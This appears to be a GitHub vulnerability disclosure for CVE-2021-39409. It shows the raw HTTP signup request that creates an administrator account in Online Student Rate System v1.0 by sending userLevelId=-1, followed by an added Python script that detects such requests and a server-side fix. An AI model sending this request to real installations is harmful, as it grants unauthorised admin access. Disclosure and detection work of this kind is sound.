
CVE-2021-39409: GitHub - StefanDorresteijn/CVE-2021-39409: Admin account registration in Online Student Rate System

A vulnerability exists in Online Student Rate System v1.0 that allows any user to register as an administrator without needing to be authenticated.


CVE-2021-39409

Admin account registration is possible in Online Student Rate System v1.0, allowing a malicious actor to create an admin account and access the admin panel.

Vulnerability

POST /ajax.php?action=signup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: http://localhost
Connection: close
Referer: http://localhost

username=testaccount&passsword=098f6bcd4621d373cade4e832627b4f6&userLevelId=-1&[email protected]
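
A detection check for the request shape shown above, as an added example that is not part of the original advisory or the project's code: it parses a captured raw HTTP request and reports when a signup call to /ajax.php carries the client-supplied userLevelId field. The function names and the two sample requests are constructed for illustration; only the endpoint, the action value and the field name come from the request on this page.

```python
from urllib.parse import urlsplit, parse_qs

# Privilege-bearing field seen in the request on this page. Compared in
# lower case so that case variants in captured traffic are flagged too.
PRIVILEGE_FIELDS = {"userlevelid"}

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()

def privilege_fields_in_signup(raw: str):
    """Return the privilege fields a signup request tries to set, else []."""
    try:
        method, target, headers, body = parse_request(raw)
    except ValueError:
        return []  # not a parseable request line
    url = urlsplit(target)
    actions = parse_qs(url.query).get("action", [])
    if method.upper() != "POST" or not url.path.endswith("/ajax.php"):
        return []
    if "signup" not in actions:
        return []
    content_type = headers.get("content-type", "").lower()
    if "application/x-www-form-urlencoded" not in content_type:
        return []
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(k for k in fields if k.lower() in PRIVILEGE_FIELDS)

# Constructed sample requests (not real traffic).
_HEAD = ("POST /ajax.php?action={a} HTTP/1.1\r\nHost: localhost\r\n"
         "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n\r\n")
SAMPLE_FLAGGED = _HEAD.format(a="signup") + "username=demo&userLevelId=-1"
SAMPLE_CLEAN = _HEAD.format(a="signup") + "username=demo"
SAMPLE_OTHER = _HEAD.format(a="login") + "username=demo&userLevelId=-1"

if __name__ == "__main__":
    for name in ("SAMPLE_FLAGGED", "SAMPLE_CLEAN", "SAMPLE_OTHER"):
        print(name, privilege_fields_in_signup(globals()[name]))
```

A hit is a signal for review or blocking at a proxy; the durable fix is for the signup handler to assign the account level server-side and ignore any level sent by the client.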
